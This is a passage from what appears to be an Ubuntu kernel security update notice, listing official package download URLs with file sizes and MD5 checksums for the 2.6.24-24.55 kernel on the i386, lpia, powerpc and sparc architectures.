http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb\n      Size/MD5:  2086100 0199324ff0fe5d6e7d833a3c07a6ac0a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-24-386_2.6.24-24.55_i386.deb\n      Size/MD5:   652664 06b4ba3927add4c3a8fb5ee484129bd5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-24-generic_2.6.24-24.55_i386.deb\n      Size/MD5:   655538 f1aad1bb26f9fdaea6bee64cdf6e69d7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-24-openvz_2.6.24-24.55_i386.deb\n      Size/MD5:  1239292 17b21b1c71a637a1f3470befdc6e244c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-24-rt_2.6.24-24.55_i386.deb\n      Size/MD5:  1259626 c857ca06ef5630c9b6faad7c13ef1449\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-24-server_2.6.24-24.55_i386.deb\n      Size/MD5:   657340 e5fc27b2ba6419ae6110bfdb147dc50a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-24-virtual_2.6.24-24.55_i386.deb\n      Size/MD5:   557898 1d6abe04efc461e263605280c3d6a327\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-24-xen_2.6.24-24.55_i386.deb\n      Size/MD5:  1058088 1de1a8532504cfab66b9afb58aa7fd64\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-24-386_2.6.24-24.55_i386.deb\n      Size/MD5: 18368104 894bae5c45f3313fa6ffde9c5403a050\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-24-generic_2.6.24-24.55_i386.deb\n      Size/MD5: 18389358 0f87aba56c1e970dcc7a05c178764c59\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-24-server_2.6.24-24.55_i386.deb\n      Size/MD5: 18498588 f5c1063f494bd8000f41db10a4c923a3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-24-virtual_2.6.24-24.55_i386.deb\n      Size/MD5:  8686422 ff430f2f608d318cfdc9ee1f085232c0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-24-386_2.6.24-24.55_i386.deb\n      Size/MD5: 25497824 3fdb3a0bae1754cc7dcd5fc13e5c92f3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-24-generic_2.6.24-24.55_i386.deb\n      Size/MD5: 26304704 fbf86e8b9355cd2a4dc4e964ce93a1e1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-24-server_2.6.24-24.55_i386.deb\n      Size/MD5: 27324298 f2411de5448b6b3dc5041ae93e3fbad8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-24-virtual_2.6.24-24.55_i386.deb\n      Size/MD5: 24820580 7c3be9e7dca67713529e3f593c28ca8d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-24.55_i386.deb\n      Size/MD5:   705292 e7ea84e2f6120b20e2718223efe47e4a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb\n      Size/MD5:   258744 758ec24355c4c81cb04be0b337b79d22\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb\n      Size/MD5:   264062 c3f0e5c7f02e751e8db755eb939e493f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb\n      Size/MD5:   163194 681a38c27b55f122aff23ddc43358e82\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb\n      Size/MD5:   162950 64cab9f1cece7117949678fd7022be38\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb\n      Size/MD5:   236500 02a04c11e39555ded5a1af39a31f2e1b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb\n      Size/MD5:   244826 1536f32ebccf86886505f5c111275425\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb\n      Size/MD5:  1809006 eaa66dd9cdf3cae2f3387bc50b0aca3f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb\n      Size/MD5:  1826238 ef6179911307b224bfbc9442d401168d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb\n      Size/MD5:   150794 3dce18851cd0f9da0e49af7df236dac8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb\n      Size/MD5:   142948 69d90acefce82696bb1db4f68bfc70c9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb\n      Size/MD5:   155958 15a467bdd1e7bdbf50d61a024502acb4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb\n      Size/MD5:   156974 69832b6793dd3c121ae93eada967077d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb\n      Size/MD5:   107174 d2138453acdf0e700bdf074e33e99286\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb\n      Size/MD5:   108480 fedf19d305e641f2d3c370dced2309e5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb\n      Size/MD5:    32962 e7bd906326133b9381e2cb49c8af646b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb\n      Size/MD5:    33388 bcad2f4d1eb61a1d7d795e75854ca434\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb\n      Size/MD5:    60704 84ae7bb7df1e8102cb7a7a190d963362\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb\n      Size/MD5:    61154 66fd1b4c06a054c95fad67893640b621\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb\n      Size/MD5:    82652 ce2130dbd82535557b662084e728928a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb\n      Size/MD5:    82958 d439c65c130de9fa29027716f8710874\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb\n      Size/MD5:    48356 daa2818cfb4b21a7032416c18182b147\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb\n      Size/MD5:    48244 6a2211f86f7f8df90c5b8ceb38a4a627\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb\n      Size/MD5:     8190 b40afdf981d8fe354b20d0bc7cc83c3a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb\n      Size/MD5:     8440 70afae21dbbd5f5cef34294c8de8e725\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb\n      Size/MD5:    51050 5fe6712265c74000a7d92360c4d1ac81\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb\n      Size/MD5:    52908 cf6981bb68eb23f899b6a55642238b7b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb\n      Size/MD5:    92184 fe7ae21dc89d89b1921f4ed7cbbabf59\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb\n      Size/MD5:    92448 e18bed4505a2ca45dfd67499c87f3b8b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb\n      Size/MD5:  1442928 f9784301cbe888b3a7610f69210845c9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb\n      Size/MD5:  1426196 fee708e2af1dab92610fb1c3496c95da\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb\n      Size/MD5:    43236 4b344cdc662f35bad896e8c7bc726f21\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb\n      Size/MD5:    42796 91578f1e887bac7983dae7884b357616\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb\n      Size/MD5:    11406 097f3d4965b4fb4b62250309b71ea556\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb\n      Size/MD5:    12016 4c3681d6ac324a27218a5d7f1eb012a4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb\n      Size/MD5:   470332 975e3f02a4bdd541e27f7c917bcfcb11\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb\n      Size/MD5:   472254 3d79ecbffb9a08a25f5e818718137079\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb\n      Size/MD5:    70450 aeb3fece9342114f992fec68f5d48f71\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb\n      Size/MD5:    71368 a6bb96b015f25d08f5628aeedd3bcb81\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-24-openvz_2.6.24-24.55_i386.deb\n      Size/MD5: 20243576 c1424fd878abdcd2a7bc29fc88369c9b\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-24-rt_2.6.24-24.55_i386.deb\n      Size/MD5: 18527060 4213eff1e17851fd9a6ba77150b54638\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-24-xen_2.6.24-24.55_i386.deb\n      Size/MD5: 18773284 a33c73287198621afbe02e414e91d696\n\n  lpia architecture (Low Power Intel Architecture):\n\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-24-lpia_2.6.24-24.55_lpia.deb\n      Size/MD5:   636610 4747e9fa2334ce46a6f0700646291dd9\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-24-lpiacompat_2.6.24-24.55_lpia.deb\n      Size/MD5:   703234 44e3bcfa9a931471c392192cfb0c54a8\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-24-lpia_2.6.24-24.55_lpia.deb\n      Size/MD5: 14504750 5e482a7e08464985b808a6230a00d1b3\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-24.55_lpia.deb\n      Size/MD5:   705278 c7d8b590dbff2f80c38689e174e2723a\n    http://ports.ubuntu.com/pool/universe/l/linux/linux-image-2.6.24-24-lpiacompat_2.6.24-24.55_lpia.deb\n      Size/MD5: 19810228 4d05fa4a2372061c0c1ac2637ee08ff6\n\n  powerpc architecture (Apple Macintosh G3/G4/G5):\n\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:   334050 549350eae9ac212a55977acc795e683f\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:   318864 ab27ac3a958eb09b9d12fafd09a77df8\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:    62716 00b04f957690db8a0ba8a22438f2e496\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:    73002 e8cb037fdde1bdb771482900638bb6d4\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:    41434 88738c9f94ad51860b132ec86417d295\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:    47824 b3c9f8d3e3d792c644dc6dff2da19df8\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:    89458 52a345ac135c1ac50f528412b7d31f75\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:   105682 57846bf90eef89a20cdf99b67e2f6b2a\n    http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:    44804 3f9bc834fa30a5f15a054bc4a1ffcae0\n    http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:    40928 a1c7bfd9166c6dbd96f79c7454d72bb4\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:   704240 118333ea34b764806834b8da0975eb32\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:   770534 f2ff41faa006ee681e1f0fa467626f98\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:   242804 cd1d00ce97f420cc7a7ea0e73b11bc17\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:   245874 bddc2d618001db1be1d3330b921e498a\n    http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:    69130 630b48f7871d88b3c2ec42ba406b56df\n    http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:   132574 c32734e71c98e17a3d3326c2d0caaa03\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:    70240 1f2caeecf72dea50709079d5987714e8\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:    77438 9c53877ef28007ed1185a93ec5cf90f5\n    http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:   146066 8b3b83976cc2eec52b5dbb49568c2b44\n    http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:   165040 7e0732ce30c7d287c6897fd89f0eab03\n    http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:   387144 7681e85a926a3cfd4bd1101bfe802ef0\n    http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:   350038 c70af186448028febde4ce8eb77751f7\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:  2429338 f466200ef72ff34ab3048e67e2fefa4d\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:  3471000 339b6ce1c1190471faa546011cbe67a6\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-24-powerpc-smp_2.6.24-24.55_powerpc.deb\n      Size/MD5:   650754 d55d970951a1844ed71f6e3c91709989\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-24-powerpc64-smp_2.6.24-24.55_powerpc.deb\n      Size/MD5:   654978 1b04d2d2aab7846f7799a90433106d2e\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-24-powerpc_2.6.24-24.55_powerpc.deb\n      Size/MD5:   650486 a9a4f052ac25ea294b6d285808c441da\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-24-powerpc-smp_2.6.24-24.55_powerpc.deb\n      Size/MD5: 20160752 f0ee78fa89e85b317dc850d8a5cd5f4c\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-24-powerpc64-smp_2.6.24-24.55_powerpc.deb\n      Size/MD5: 21366650 f8c2e33729bac5cc66aade8eed5893a9\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-24-powerpc_2.6.24-24.55_powerpc.deb\n      Size/MD5: 19924130 c30583206aa8506e4f8316e3519bb038\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-24.55_powerpc.deb\n      Size/MD5:   695442 60d6d8281a73567a3a1859e603604f2d\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:   266766 d734653d249aba57e366ae07a6b1fc93\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:   307642 097f927755577ead97570034ae0f6388\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:   192170 d8d4fde8fe228d72875d66dd761ed7df\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:   201578 5f98ef6e232bfb91d8a91be636a154c9\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:   271794 5072cd3330a816dcaa3a77f3805464e3\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:   305896 4fe491fccc865c3d73ccf92bae2544b5\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:  1806898 510190e890ad1fc342fafec66b6ab616\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:  2117694 2af9aa4973ab6554eaf799abcff3e1b9\n    http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:   235192 379bf968241b634089ebbf2a3ba440e0\n    http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:   225202 4066dff0c55796f0af7809947252d479\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:   170102 1a3ccf3058cab72bba610082bd9dd390\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:   199686 447cab0246a933abfac18838eaac032a\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:   117910 9074869c8dad579b52daaafefebd100c\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:   139200 06c2711f162832bcaf4141298024f18e\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:    45366 e9f0bb9ae84949936a872f1a90ad4118\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:    46836 05b95ec8a1a0557f8b82e1b0000e2dcc\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:    51136 34dd7d7fb1c2ed5e3d1c737573fb2cd5\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:    60286 99bbe8d8d2ffb39ba38190798354c608\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:    74166 682080eb95c5a3820aacf3a3654e9a77\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:    87206 4e21dc9fe1e1899d668fa3e0a5e15e14\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:    76004 1ae6a390c94233465c10686bf504e4bc\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:    30226 9649e84d3347d6ff643833bb0911f670\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:     8492 100b04ee69053cb99263a9639d1fe52e\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:    10026 9b7c48978f55d3ab82a253db053175d7\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:    57368 dbba71ebc8d5e9ab03a061cc143d8c6e\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:    68688 9dba3901ed2ccf499412430b8ae02ffe\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:   101246 290026d8946c001bd7e2f9e8d6510a6b\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:   147768 ad3b8e8f8947d09aa69cbd7f9034e440\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:  1565048 4e7fd21f0fa808514fc1f84e6113e4dd\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:  1514044 2eb4cb565003a82d51c8cc36db03c6e7\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:    76680 6c5817e16da05b6017c93af9ac31fe2d\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:    85964 45673fac64f8a6d5074a5173bfeb38e0\n    http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:    12710 25923caf1ed00118907a4e61b5df617f\n    http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:    14558 22805c8e35fa454f643f9913f2a0083d\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:   449544 ff9ce90996651531510b7880de3d87fd\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:   504018 c28ce7f4984fff73f65845d644d956db\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:    83508 cc54fd358a4e6f5b812fefc493f53d49\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb\n      Size/MD5:   108720 70ec0fd895b63491bc5b5e895d23e730\n\n  sparc architecture (Sun SPARC/UltraSPARC):\n\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb\n      Size/MD5:    59596 e0228d1b8d48dcb9b2eeb5a133fd4fea\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb\n      Size/MD5:    71728 1cde4a7c06765886c874a504349c7295\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb\n      Size/MD5:    42454 dede4ea8cdb116e8865de77c903012a6\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb\n      Size/MD5:    91760 fb38bcd0b2c03e153c25569fd6bf6f7f\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb\n      Size/MD5:   587002 31d43eb6a4b4fba550bd644c5e3dab86\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb\n      Size/MD5:   171008 431c1bde571792a29e2c746ac89f4069\n    http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb\n      Size/MD5:    22354 17062dcda3c2018f97dbc320045cff0e\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb\n      Size/MD5:    46050 111c0d79c0bdad8a685f422383037219\n    http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb\n      Size/MD5:   152862 e2cc622a55df2744b07812def8c89239\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb\n      Size/MD5:  2121270 a2a2e37a9c05525401efaffc7ce199e7\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-24-sparc64-smp_2.6.24-24.55_sparc.deb\n      Size/MD5:   562642 a76540180de0ac6e12dac23389ac1b3f\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-24-sparc64_2.6.24-24.55_sparc.deb\n      Size/MD5:   560822 72eb5f3fcb523dd8106850417fd0520e\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-24-sparc64-smp_2.6.24-24.55_sparc.deb\n      Size/MD5: 14090906 2d868fdedfc320b2239dbf301790d1dc\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-24-sparc64_2.6.24-24.55_sparc.deb\n      Size/MD5: 13802896 bf6e9b86cbdede26fd89061b10296551\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-24.55_sparc.deb\n      Size/MD5:   750358 2aa64567f87f3e01794a2c86529da23d\n    